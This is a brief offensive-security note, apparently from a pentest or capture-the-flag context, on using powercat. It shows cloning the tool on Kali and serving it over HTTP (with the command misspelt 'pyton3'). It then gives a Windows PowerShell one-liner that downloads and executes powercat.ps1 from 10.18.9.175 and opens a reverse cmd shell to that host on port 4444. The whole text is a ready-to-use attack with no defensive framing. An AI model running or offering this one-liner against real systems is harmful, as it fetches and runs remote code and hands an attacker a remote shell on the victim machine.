Skip to content

Powercat

on kali

git clone https://github.com/besimorhino/powercat.git
cd powercat
pyton3 -m http.server

on windows

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.18.9.175:8000/powercat.ps1');powercat -c 10.18.9.175 -p 4444 -e cmd"